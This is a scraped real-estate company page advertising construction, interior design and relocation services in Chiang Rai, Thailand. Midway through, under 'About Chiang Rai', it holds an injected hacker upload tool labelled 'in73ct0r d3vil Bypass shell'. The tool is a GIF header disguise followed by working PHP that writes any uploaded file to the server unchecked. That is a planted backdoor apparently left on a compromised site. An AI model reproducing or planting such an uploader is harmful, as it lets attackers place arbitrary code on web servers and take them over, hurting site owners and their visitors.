CR-Estate The best real estate in Chiang Rai

Construction Services

Do you wish to build or renovate your property in the scenic province of Chiang Rai, whether it is a private residence or a commercial property?

 

We provide a comprehensive range of design and construction services for most types of properties, which include single family homes, serviced apartments, boutique hotel resorts, retail stores and other types of commercial properties. We also offer our design services for corporate clients who wish to build their own collections. Our in-house designers have international experience and they are also knowledgeable in the manufacturing process.

We have been working with the same team of contractors for the past twelve years and have in-depth local knowledge.
From assisting you with the construction drawings through to delivering a project according to your specifications, we can provide a comprehensive service as outlined below.

  • Provide a contractor, construction team and structural engineer
  • Assist with design, drawings and obtaining a building permit
  • Project management, which includes drafting a Contract, Construction Plan, preparation of Bill of Quantities, Purchasing, Accounts and On-site Supervision by a foreman
  • Comprehensive range of Interior Design services, which includes interior floorplans, pre-selection of furniture, interior decor accessories, outdoor furniture and garden accessories, and soft furnishings for a complete fit-out


Please give us a call to discuss your requirements, whether you are still in the planning stages or are looking for a qualified contractor to complete the construction of your project.
 
We also offer relocation services, because we know that moving home, especially to a foreign country, can be a stressful experience, and that many people do not have the time to take care of all the administrative necessities, such as setting up internet and electricity or obtaining a visa. Again, please call us to discuss your requirements.

 

ABOUT CHIANG RAI

GIF89;a

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>File Uploader Private</title>
   <meta name="generator" content="in73ct0r" />
<meta name="author" content="in73ct0r" />
<meta name="description" content="[ in73ct0r d3vil ]" />
<style>
body {
    background: #000000 url(https://lh6.googleusercontent.com/-uRLX3SeDrdI/TjBpUFR5oeI/AAAAAAAAAIo/GYSnWQxGWMc/cok.gif) scroll repeat center center;
    color: silver;
    font-family: Comic Sans MS;
    font-size: 14px;
    font-weight: bold
}
#black{
    text-align: center;
    font-size:14px;
    font-weight: bold;
}
a:link, a:visited `font-weight:normal; text-decoration:none; color:silver;`
a:hover `font-weight:bold; text-decoration:none; cursor:default;`

</style>
</head>

<body>
<?php
    $myUpload = new maxUpload(); 
    //$myUpload->setUploadLocation(getcwd().DIRECTORY_SEPARATOR);
    $myUpload->uploadFile();
?>
<?php

class maxUpload{
    var $uploadLocation;
    

    function maxUpload(){
        $this->uploadLocation = getcwd().DIRECTORY_SEPARATOR;
    }


    function setUploadLocation($dir){
        $this->uploadLocation = $dir;
    }
    
    function showUploadForm($msg='',$error=''){
?>
       <div id="container">
            <center><b>in73ct0r d3vil Bypass shell</b></center><br/>
<?php
if ($msg != ''){
    echo '<p class="msg">'.$msg.'</p>';
} else if ($error != ''){
    echo '<p class="emsg">'.$error.'</p>';

}
?>
                <form action="" method="post" enctype="multipart/form-data" >
                     <center>
                         <label><b>File: </b>
                             <input name="myfile" type="file" size="30" />
                         </label>
                         <label>
                             <input type="submit" name="submitBtn" class="sbtn" value="Upload" />
                         </label>
                     </center>
                 </form>
             </div>
          
<?php
    }

    function uploadFile(){
        if (!isset($_POST['submitBtn'])){
            $this->showUploadForm();
        } else {
            $msg = '';
            $error = '';
            
            //Check destination directory
            if (!file_exists($this->uploadLocation)){
                $error = "The target directory doesn't exists!";
            } else if (!is_writeable($this->uploadLocation)) {
                $error = "The target directory is not writeable!";
            } else {
                $target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']);

                if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) {
                    $msg = basename( $_FILES['myfile']['name']).
                    " was uploaded successfully!";
                } else{
                    $error = "The upload process failed! :-( ";
                }
            }

            $this->showUploadForm($msg,$error);
        }

    }

}
?>
</body>

MORE...

For the best display view, Please use google chrome web browser.

Copyright © CR-Estate.com